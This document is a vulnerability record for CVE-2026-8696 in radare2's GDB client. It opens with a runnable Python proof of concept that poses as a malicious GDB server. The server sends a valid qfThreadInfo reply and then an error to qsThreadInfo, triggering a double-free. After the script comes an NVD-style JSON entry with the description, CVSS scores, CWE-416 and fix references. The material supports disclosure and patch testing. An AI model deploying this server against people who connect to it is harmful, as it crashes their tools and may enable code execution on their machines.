CVE-2026-8696

#!/usr/bin/env python3 """ PoC for CVE-2026-8696: Malformed GDB Server This script simulates a malicious GDB server that triggers the UAF in radare2. It sends a valid response to qfThreadInfo (allocating memory) and then an error response to qsThreadInfo (triggering the double-free). """ import socket import threading def handle_client(client_socket): try: # Basic GDB handshake client_socket.recv(1024) # Usually '+' or ack client_socket.send(b'+') while True: data = client_socket.recv(1024).decode(errors='ignore') if not data: break # Remove checksums if present for simplicity cmd = data.split('#')[0] if "qSupported" in cmd: client_socket.send(b'+') client_socket.send(b'PacketSize=1024;qXfer:features:read+;multiprocess+') elif "qfThreadInfo" in cmd: # Send a valid thread ID to trigger RDebugPid allocation client_socket.send(b'+') client_socket.send(b'm1;') # Process ID 1 elif "qsThreadInfo" in cmd: # Send error to trigger cleanup and double-free client_socket.send(b'+') client_socket.send(b'E01') # Error code elif "Hg" in cmd or "qC" in cmd: client_socket.send(b'+') client_socket.send(b'OK') else: client_socket.send(b'+') client_socket.send(b'$#00') except Exception as e: print(f"Connection closed: {e}") finally: client_socket.close() def start_server(port=9999): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(('0.0.0.0', port)) server.listen(5) print(f"[*] Malicious GDB server listening on port {port}") while True: client, addr = server.accept() print(f"[*] Accepted connection from {addr[0]}:{addr[1]}") client_handler = threading.Thread(target=handle_client, args=(client,)) client_handler.start() if __name__ == "__main__": start_server()

{"cve": {"id": "CVE-2026-8696", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:39.360", "lastModified": "2026-05-15T21:16:39.360", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 6.1.5 contains a use-after-free vulnerability in the gdbr_pids_list() function within the GDB client core that allows remote attackers to cause a denial of service or potentially execute arbitrary code by sending malformed thread information responses. Attackers can trigger the vulnerability by causing qsThreadInfo to fail after qfThreadInfo successfully allocates RDebugPid structures, resulting in double-free memory corruption when the error path attempts to clean up the list."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://github.com/radareorg/radare2/commit/c213ad6894a1eb9086ac8bf5fae35757e9e1683c", "source": "[email protected]"}, {"url": "https://github.com/radareorg/radare2/issues/25836", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/radare2-use-after-free-via-gdbr-pids-list", "source": "[email protected]"}]}}